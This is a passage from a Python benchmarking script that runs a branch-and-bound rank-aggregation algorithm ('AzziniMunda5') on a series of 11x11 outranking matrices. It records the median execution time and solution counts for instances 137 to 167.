om = np.array([
[0,22,29,29,41,28,33,28,20,32,32],
[29,0,19,29,29,24,29,24,29,37,27],
[22,32,0,47,51,24,28,38,28,22,18],
[22,22,4,0,12,18,22,18,28,22,12],
[10,22,0,39,0,18,10,18,16,18,12],
[23,27,27,33,33,0,33,41,33,21,19],
[18,22,23,29,41,18,0,28,28,8,12],
[23,27,13,33,33,10,23,0,19,21,13],
[31,22,23,23,35,18,23,32,0,12,12],
[19,14,29,29,33,30,43,30,39,0,33],
[19,24,33,39,39,32,39,38,39,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 137, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,16,10,11,26,25,19,16,21,21,26],
[35,0,25,36,36,25,26,16,36,36,18],
[41,26,0,33,40,25,23,16,15,30,26],
[40,15,18,0,19,26,23,16,18,26,23],
[25,15,11,32,0,19,21,12,22,22,16],
[26,26,26,25,32,0,26,15,15,15,16],
[32,25,28,28,30,25,0,26,18,18,33],
[35,35,35,35,39,36,25,0,36,35,26],
[30,15,36,33,29,36,33,15,0,39,33],
[30,15,21,25,29,36,33,16,12,0,26],
[25,33,25,28,35,35,18,25,18,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 138, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,25,21,23,21,25,21,22,24,22],
[30,0,32,27,28,26,31,28,24,29,29],
[26,19,0,28,25,23,25,19,20,22,24],
[30,24,23,0,27,25,26,24,27,22,25],
[28,23,26,24,0,25,28,30,22,22,25],
[30,25,28,26,26,0,29,18,27,28,21],
[26,20,26,25,23,22,0,24,22,25,26],
[30,23,32,27,21,33,27,0,22,31,29],
[29,27,31,24,29,24,29,29,0,24,28],
[27,22,29,29,29,23,26,20,27,0,25],
[29,22,27,26,26,30,25,22,23,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 139, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,24,25,16,29,22,22,25,19,30],
[25,0,31,26,22,33,26,28,28,18,24],
[27,20,0,30,19,34,31,28,35,28,36],
[26,25,21,0,17,26,16,17,28,12,18],
[35,29,32,34,0,36,27,27,39,19,36],
[22,18,17,25,15,0,11,24,26,14,24],
[29,25,20,35,24,40,0,23,34,24,33],
[29,23,23,34,24,27,28,0,33,23,34],
[26,23,16,23,12,25,17,18,0,17,24],
[32,33,23,39,32,37,27,28,34,0,29],
[21,27,15,33,15,27,18,17,27,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 140, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,26,20,30,27,22,23,24,29,33],
[32,0,32,23,34,30,22,26,28,28,30],
[25,19,0,17,29,30,21,22,18,24,32],
[31,28,34,0,32,29,33,27,21,30,33],
[21,17,22,19,0,30,19,19,16,26,30],
[24,21,21,22,21,0,25,18,26,23,27],
[29,29,30,18,32,26,0,28,26,27,31],
[28,25,29,24,32,33,23,0,23,27,31],
[27,23,33,30,35,25,25,28,0,34,29],
[22,23,27,21,25,28,24,24,17,0,34],
[18,21,19,18,21,24,20,20,22,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 141, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,26,20,30,23,26,25,17,24,24],
[20,0,26,18,25,25,27,29,22,28,22],
[25,25,0,25,22,21,23,29,24,27,27],
[31,33,26,0,32,25,32,30,26,31,26],
[21,26,29,19,0,23,30,26,17,29,26],
[28,26,30,26,28,0,23,28,23,23,19],
[25,24,28,19,21,28,0,27,22,25,24],
[26,22,22,21,25,23,24,0,17,20,27],
[34,29,27,25,34,28,29,34,0,29,24],
[27,23,24,20,22,28,26,31,22,0,22],
[27,29,24,25,25,32,27,24,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 142, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,25,19,25,25,22,24,28,26],
[24,0,22,24,22,26,23,24,25,30,26],
[19,29,0,23,24,25,33,27,23,28,26],
[26,27,28,0,20,28,26,23,28,25,29],
[32,29,27,31,0,26,29,24,23,32,32],
[26,25,26,23,25,0,26,31,22,26,27],
[26,28,18,25,22,25,0,24,25,29,29],
[29,27,24,28,27,20,27,0,26,26,27],
[27,26,28,23,28,29,26,25,0,27,29],
[23,21,23,26,19,25,22,25,24,0,23],
[25,25,25,22,19,24,22,24,22,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 143, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,30,25,32,27,26,33,32,26,25],
[25,0,25,21,27,25,22,31,37,22,22],
[21,26,0,24,33,28,25,28,31,24,27],
[26,30,27,0,33,27,27,37,35,25,29],
[19,24,18,18,0,15,15,30,26,21,16],
[24,26,23,24,36,0,24,28,33,25,28],
[25,29,26,24,36,27,0,28,32,25,28],
[18,20,23,14,21,23,23,0,29,20,17],
[19,14,20,16,25,18,19,22,0,19,20],
[25,29,27,26,30,26,26,31,32,0,27],
[26,29,24,22,35,23,23,34,31,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 144, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,19,30,32,21,23,38,30,23,25],
[15,0,21,23,25,24,20,33,29,22,23],
[32,30,0,27,29,31,29,39,25,30,22],
[21,28,24,0,37,28,27,42,30,25,28],
[19,26,22,14,0,30,31,36,31,18,28],
[30,27,20,23,21,0,26,33,28,23,21],
[28,31,22,24,20,25,0,27,27,23,35],
[13,18,12,9,15,18,24,0,15,11,20],
[21,22,26,21,20,23,24,36,0,13,25],
[28,29,21,26,33,28,28,40,38,0,31],
[26,28,29,23,23,30,16,31,26,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 145, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,38,30,32,29,29,31,27,21,22,31],
[13,0,15,29,22,25,23,25,19,13,14],
[21,36,0,33,29,21,21,28,30,25,14],
[19,22,18,0,23,17,18,13,26,20,11],
[22,29,22,28,0,19,20,24,31,18,22],
[22,26,30,34,32,0,30,31,35,23,28],
[20,28,30,33,31,21,0,24,30,26,13],
[24,26,23,38,27,20,27,0,25,22,19],
[30,32,21,25,20,16,21,26,0,19,17],
[29,38,26,31,33,28,25,29,32,0,26],
[20,37,37,40,29,23,38,32,34,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 146, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,20,26,27,20,24,18,31,29,30],
[19,0,20,29,25,18,29,26,31,25,41],
[31,31,0,35,23,18,33,24,36,31,36],
[25,22,16,0,21,21,14,23,25,21,29],
[24,26,28,30,0,28,22,30,29,31,37],
[31,33,33,30,23,0,23,26,24,25,31],
[27,22,18,37,29,28,0,21,22,32,37],
[33,25,27,28,21,25,30,0,33,28,29],
[20,20,15,26,22,27,29,18,0,18,30],
[22,26,20,30,20,26,19,23,33,0,33],
[21,10,15,22,14,20,14,22,21,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 147, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,25,30,27,26,31,26,29,27,30],
[30,0,33,31,30,29,35,34,23,31,34],
[26,18,0,27,31,28,35,30,26,26,30],
[21,20,24,0,22,23,28,22,16,20,22],
[24,21,20,29,0,27,29,28,26,22,27],
[25,22,23,28,24,0,33,26,28,23,25],
[20,16,16,23,22,18,0,22,24,22,21],
[25,17,21,29,23,25,29,0,22,26,24],
[22,28,25,35,25,23,27,29,0,27,26],
[24,20,25,31,29,28,29,25,24,0,25],
[21,17,21,29,24,26,30,27,25,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 148, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,31,24,34,30,24,22,25,27,27],
[20,0,25,22,24,25,22,18,24,21,25],
[20,26,0,27,27,24,26,23,23,21,20],
[27,29,24,0,31,28,29,20,30,30,24],
[17,27,24,20,0,23,20,20,23,18,21],
[21,26,27,23,28,0,27,22,23,23,22],
[27,29,25,22,31,24,0,23,21,24,25],
[29,33,28,31,31,29,28,0,29,27,24],
[26,27,28,21,28,28,30,22,0,24,23],
[24,30,30,21,33,28,27,24,27,0,23],
[24,26,31,27,30,29,26,27,28,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 149, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,22,26,20,31,25,19,24,25,24],
[25,0,20,23,21,27,19,21,28,21,27],
[29,31,0,29,23,32,31,23,28,28,32],
[25,28,22,0,22,28,22,28,26,26,31],
[31,30,28,29,0,29,31,25,32,26,33],
[20,24,19,23,22,0,19,21,25,20,24],
[26,32,20,29,20,32,0,24,30,25,31],
[32,30,28,23,26,30,27,0,31,28,33],
[27,23,23,25,19,26,21,20,0,23,25],
[26,30,23,25,25,31,26,23,28,0,26],
[27,24,19,20,18,27,20,18,26,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 150, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,20,23,17,14,8,22,15,29,20],
[25,0,25,20,23,25,10,16,14,28,22],
[31,26,0,35,16,31,8,22,15,29,17],
[28,31,16,0,27,17,14,14,10,23,15],
[34,28,35,24,0,31,28,22,24,30,28],
[37,26,20,34,20,0,19,28,28,37,25],
[43,41,43,37,23,32,0,24,19,36,26],
[29,35,29,37,29,23,27,0,32,42,27],
[36,37,36,41,27,23,32,19,0,24,22],
[22,23,22,28,21,14,15,9,27,0,14],
[31,29,34,36,23,26,25,24,29,37,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 151, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,25,28,23,26,25,30,25,29,21],
[29,0,25,31,25,26,19,29,24,29,22],
[26,26,0,22,28,31,24,28,26,30,22],
[23,20,29,0,25,26,20,31,28,25,26],
[28,26,23,26,0,23,23,29,27,25,18],
[25,25,20,25,28,0,24,27,22,23,16],
[26,32,27,31,28,27,0,26,25,35,23],
[21,22,23,20,22,24,25,0,27,24,24],
[26,27,25,23,24,29,26,24,0,28,18],
[22,22,21,26,26,28,16,27,23,0,19],
[30,29,29,25,33,35,28,27,33,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 152, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,22,26,28,20,31,24,31,29,34],
[30,0,26,23,33,31,31,31,30,34,35],
[29,25,0,23,32,27,29,25,25,31,32],
[25,28,28,0,27,29,31,28,30,35,31],
[23,18,19,24,0,21,31,27,26,29,29],
[31,20,24,22,30,0,31,27,28,34,33],
[20,20,22,20,20,20,0,28,28,25,26],
[27,20,26,23,24,24,23,0,32,26,29],
[20,21,26,21,25,23,23,19,0,23,27],
[22,17,20,16,22,17,26,25,28,0,29],
[17,16,19,20,22,18,25,22,24,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 153, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,30,32,28,29,28,20,29,24,26],
[26,0,28,31,31,27,23,29,27,25,24],
[21,23,0,28,26,30,24,23,29,29,29],
[19,20,23,0,24,28,24,21,28,21,27],
[23,20,25,27,0,21,21,22,26,29,20],
[22,24,21,23,30,0,25,27,27,25,25],
[23,28,27,27,30,26,0,22,27,24,25],
[31,22,28,30,29,24,29,0,32,21,22],
[22,24,22,23,25,24,24,19,0,21,20],
[27,26,22,30,22,26,27,30,30,0,27],
[25,27,22,24,31,26,26,29,31,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 154, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,20,18,20,16,23,23,20,23,21],
[34,0,27,24,24,25,29,32,27,28,26],
[31,24,0,22,23,21,21,25,23,25,28],
[33,27,29,0,27,23,26,29,28,31,26],
[31,27,28,24,0,20,30,31,25,30,27],
[35,26,30,28,31,0,30,28,25,29,29],
[28,22,30,25,21,21,0,33,26,22,30],
[28,19,26,22,20,23,18,0,23,23,28],
[31,24,28,23,26,26,25,28,0,27,28],
[28,23,26,20,21,22,29,28,24,0,28],
[30,25,23,25,24,22,21,23,23,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 155, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,35,33,27,25,33,28,34,34,26],
[15,0,20,18,21,18,19,15,27,21,20],
[16,31,0,23,27,26,23,17,29,25,18],
[18,33,28,0,24,22,22,27,28,29,18],
[24,30,24,27,0,26,27,30,34,32,25],
[26,33,25,29,25,0,28,34,35,32,28],
[18,32,28,29,24,23,0,26,29,35,24],
[23,36,34,24,21,17,25,0,32,30,19],
[17,24,22,23,17,16,22,19,0,24,17],
[17,30,26,22,19,19,16,21,27,0,22],
[25,31,33,33,26,23,27,32,34,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 156, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,26,26,29,33,28,24,20,21],
[24,0,25,25,28,20,25,26,25,23,23],
[19,26,0,25,23,18,28,24,20,20,21],
[25,26,26,0,25,20,35,30,30,24,25],
[25,23,28,26,0,22,26,28,20,25,17],
[22,31,33,31,29,0,33,35,28,26,26],
[18,26,23,16,25,18,0,25,21,15,20],
[23,25,27,21,23,16,26,0,19,20,17],
[27,26,31,21,31,23,30,32,0,22,26],
[31,28,31,27,26,25,36,31,29,0,24],
[30,28,30,26,34,25,31,34,25,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 157, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,30,28,24,24,22,25,19,21,25],
[21,0,24,21,21,19,18,24,16,21,23],
[21,27,0,22,19,18,25,25,17,27,22],
[23,30,29,0,18,27,25,24,22,26,26],
[27,30,32,33,0,29,28,23,28,26,23],
[27,32,33,24,22,0,27,25,20,25,27],
[29,33,26,26,23,24,0,29,24,30,24],
[26,27,26,27,28,26,22,0,17,24,24],
[32,35,34,29,23,31,27,34,0,35,35],
[30,30,24,25,25,26,21,27,16,0,27],
[26,28,29,25,28,24,27,27,16,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 158, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,21,28,28,24,25,32,22,22,30],
[31,0,31,30,36,29,38,38,23,25,23],
[30,20,0,28,29,18,27,36,21,32,21],
[23,21,23,0,30,25,29,31,20,24,22],
[23,15,22,21,0,15,19,30,14,20,18],
[27,22,33,26,36,0,28,38,24,26,22],
[26,13,24,22,32,23,0,26,18,30,24],
[19,13,15,20,21,13,25,0,9,17,13],
[29,28,30,31,37,27,33,42,0,31,23],
[29,26,19,27,31,25,21,34,20,0,23],
[21,28,30,29,33,29,27,38,28,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 159, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,18,24,22,37,35,28,26,32,25,27],
[33,0,26,28,39,26,21,28,36,31,33],
[27,25,0,20,22,33,22,30,32,27,25],
[29,23,31,0,27,30,19,27,34,28,34],
[14,12,29,24,0,25,10,19,30,20,27],
[16,25,18,21,26,0,17,24,30,25,24],
[23,30,29,32,41,34,0,29,33,34,35],
[25,23,21,24,32,27,22,0,29,24,33],
[19,15,19,17,21,21,18,22,0,24,22],
[26,20,24,23,31,26,17,27,27,0,34],
[24,18,26,17,24,27,16,18,29,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 160, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,30,30,26,26,24,30,28,28,23],
[27,0,32,28,25,28,25,26,26,32,23],
[21,19,0,24,23,20,15,23,18,24,18],
[21,23,27,0,26,24,23,26,22,29,22],
[25,26,28,25,0,24,26,25,25,32,24],
[25,23,31,27,27,0,23,29,25,29,22],
[27,26,36,28,25,28,0,29,26,35,20],
[21,25,28,25,26,22,22,0,23,29,27],
[23,25,33,29,26,26,25,28,0,31,24],
[23,19,27,22,19,22,16,22,20,0,19],
[28,28,33,29,27,29,31,24,27,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 161, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,37,27,28,23,33,28,22,29,33],
[22,0,22,12,22,16,27,26,24,25,23],
[14,29,0,23,28,24,23,31,19,24,21],
[24,39,28,0,34,29,29,41,25,30,26],
[23,29,23,17,0,21,22,30,25,21,32],
[28,35,27,22,30,0,33,34,26,26,34],
[18,24,28,22,29,18,0,29,26,24,24],
[23,25,20,10,21,17,22,0,27,25,20],
[29,27,32,26,26,25,25,24,0,28,26],
[22,26,27,21,30,25,27,26,23,0,26],
[18,28,30,25,19,17,27,31,25,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 162, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,8,23,20,26,27,18,27,8,16,17],
[43,0,43,21,43,27,37,34,18,35,18],
[28,8,0,28,25,19,26,27,18,23,10],
[31,30,23,0,38,32,32,32,30,38,33],
[25,8,26,13,0,27,19,27,11,10,10],
[24,24,32,19,24,0,34,25,9,17,33],
[33,14,25,19,32,17,0,34,16,15,8],
[24,17,24,19,24,26,17,0,17,24,17],
[43,33,33,21,40,42,35,34,0,25,25],
[35,16,28,13,41,34,36,27,26,0,25],
[34,33,41,18,41,18,43,34,26,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 163, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,14,20,17,8,20,21,25,18,29],
[30,0,30,31,20,22,20,29,33,29,40],
[37,21,0,34,22,19,31,10,30,23,34],
[31,20,17,0,23,14,23,10,25,18,16],
[34,31,29,28,0,34,23,29,25,34,37],
[43,29,32,37,17,0,23,29,25,29,37],
[31,31,20,28,28,28,0,27,17,18,21],
[30,22,41,41,22,22,24,0,38,25,41],
[26,18,21,26,26,26,34,13,0,20,18],
[33,22,28,33,17,22,33,26,31,0,33],
[22,11,17,35,14,14,30,10,33,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 164, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,17,34,25,26,10,23,31,8,9],
[23,0,20,41,22,27,13,35,34,24,11],
[34,31,0,41,18,31,28,45,32,36,40],
[17,10,10,0,1,13,8,30,20,10,9],
[26,29,33,50,0,28,13,34,34,33,32],
[25,24,20,38,23,0,10,33,30,21,24],
[41,38,23,43,38,41,0,43,30,37,47],
[28,16,6,21,17,18,8,0,32,6,22],
[20,17,19,31,17,21,21,19,0,19,18],
[43,27,15,41,18,30,14,45,32,0,32],
[42,40,11,42,19,27,4,29,33,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 165, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,20,16,25,21,22,24,26,23,26],
[32,0,24,27,28,26,25,31,25,28,23],
[31,27,0,25,26,20,24,26,23,27,26],
[35,24,26,0,22,22,26,30,26,29,30],
[26,23,25,29,0,24,27,24,25,26,26],
[30,25,31,29,27,0,26,28,27,32,25],
[29,26,27,25,24,25,0,27,24,24,29],
[27,20,25,21,27,23,24,0,25,24,21],
[25,26,28,25,26,24,27,26,0,23,26],
[28,23,24,22,25,19,27,27,28,0,26],
[25,28,25,21,25,26,22,30,25,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 166, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,20,20,21,19,18,27,19,26,16],
[29,0,21,19,23,22,25,24,21,27,21],
[31,30,0,27,29,27,19,27,20,34,27],
[31,32,24,0,23,28,24,28,24,31,25],
[30,28,22,28,0,23,19,27,19,34,22],
[32,29,24,23,28,0,28,29,30,32,27],
[33,26,32,27,32,23,0,32,23,32,25],
[24,27,24,23,24,22,19,0,23,27,18],
[32,30,31,27,32,21,28,28,0,33,27],
[25,24,17,20,17,19,19,24,18,0,18],
[35,30,24,26,29,24,26,33,24,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 167, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
